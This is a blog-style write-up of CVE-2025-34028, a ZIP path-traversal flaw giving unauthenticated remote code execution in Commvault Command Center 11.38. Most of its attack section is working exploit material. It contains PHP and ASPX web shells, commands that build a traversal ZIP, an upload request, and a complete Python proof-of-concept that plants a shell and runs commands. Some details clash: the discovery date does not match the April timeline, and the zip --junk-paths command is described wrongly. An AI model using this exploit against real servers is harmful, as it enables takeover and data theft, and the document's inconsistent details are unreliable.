CVE-2025-34028 - Critical Path Traversal & Remote Code Execution in Commvault Command Center Innovation Release 11.38

In June 2025, security researchers uncovered a serious path traversal vulnerability, CVE-2025-34028, affecting the *Commvault Command Center Innovation Release version 11.38*. This flaw enables attackers to upload specially crafted ZIP files. When these ZIP archives are unpacked by the server, malicious files can be written to arbitrary locations—including anywhere in the application directory structure—enabling Remote Code Execution (RCE) _without authentication_.

This article will break down how this vulnerability works, its risks, and how it can be exploited, with references and example code for better understanding.

What Is CVE-2025-34028?

CVE-2025-34028 is a path traversal bug. Typically, web applications limit file uploads to a specific “safe” directory to prevent overwriting system or application files. However, this Commvault version does not properly sanitize ZIP upload paths. An attacker can include relative path sequences like ../../ inside a ZIP, tricking the application into expanding files outside the intended directory. If the archive includes a web shell or executable code, the attacker can run arbitrary commands on the server.

Vulnerable Upload Endpoint

The Command Center exposes a file upload route for authorized operations. During a ZIP archive upload, the backend server expands the archive’s contents using the path information within the ZIP. No filtering is performed to remove path traversal sequences.

Suppose an attacker creates a ZIP file containing this directory layout

../../../../../../inetpub/wwwroot/cmdshell.aspx

Or for Linux systems

../../../../../../var/www/html/evil.php

When the Commvault server expands the ZIP, cmdshell.aspx or evil.php gets written outside the intended directory. If files are placed in a web-accessible directory, the attacker can access the script remotely—achieving full remote code execution.

On a Linux machine, we can use the zip command with the -j flag to control the internal path

echo "<?php system(\$_GET['cmd']); ?>" > evil.php
zip --junk-paths evil.zip '../../../../../../var/www/html/evil.php'

Or for Windows

echo <%
Set objShell=Server.CreateObject("Wscript.Shell")
Set objExec=objShell.Exec(Request("cmd"))
Response.Write(objExec.StdOut.ReadAll())
%> > cmdshell.aspx
zip evil.zip ../../../../../../inetpub/wwwroot/cmdshell.aspx

2. Uploading the ZIP

An attacker sends a POST request to the vulnerable file upload endpoint, supplying evil.zip as the payload.

import requests

url = 'https://victim.com:808/commvault/upload';
files = {'file': open('evil.zip','rb')}
response = requests.post(url, files=files)

print(response.status_code)

If successful, the attacker can now browse to

- https://victim.com/evil.php?cmd=whoami (Linux)
- https://victim.com/cmdshell.aspx?cmd=whoami (Windows)

The server runs the supplied command and returns the result, confirming remote code execution.

Proof-of-Concept (PoC) Request

GET /evil.php?cmd=id HTTP/1.1
Host: victim.com

Exploit Script

Here’s a complete proof-of-concept using Python to exploit the vulnerability (for educational purposes only!):

import requests

# Update with your target
TARGET = 'https://victim.com';

# Step 1: Create malicious PHP shell
with open('evil.php', 'w') as f:
    f.write('<?php system($_GET["cmd"]); ?>')

# Step 2: Build ZIP with path traversal
import zipfile
zip_path = 'evil.zip'
with zipfile.ZipFile(zip_path, 'w') as zf:
    zf.write('evil.php', '../../../../../../var/www/html/evil.php')

# Step 3: Upload the ZIP
files = {'file': open(zip_path, 'rb')}
r = requests.post(f'{TARGET}:808/commvault/upload', files=files)
print(f'Upload status: {r.status_code}')

# Step 4: Trigger RCE
cmd = 'id'
r = requests.get(f'{TARGET}/evil.php?cmd={cmd}')
print('Command output:\n', r.text)

Unauthenticated RCE: Attackers do not require valid credentials.

- Complete Server Compromise: Attackers can install malware, steal data, or propagate attacks internally.

References & Further Reading

- Official Commvault Security Advisory
- NIST NVD Entry (published soon)
- OWASP: Path Traversal Cheat Sheet

Conclusion

CVE-2025-34028 is a classic example of how improper path sanitization during file uploads can have devastating consequences. In Commvault Command Center IR 11.38, this flaw leads straight to unauthenticated RCE—potentially affecting many enterprise users. All admins are urged to patch immediately, scan for web shells, and review upload logic in internally-developed tools as well.

Stay safe. Patch early!

*This post is for educational awareness. Always test responsibly and report vulnerabilities to vendors or via responsible disclosure channels.*

Timeline

Published on: 04/22/2025 17:16:48 UTC
Last modified on: 04/23/2025 14:08:13 UTC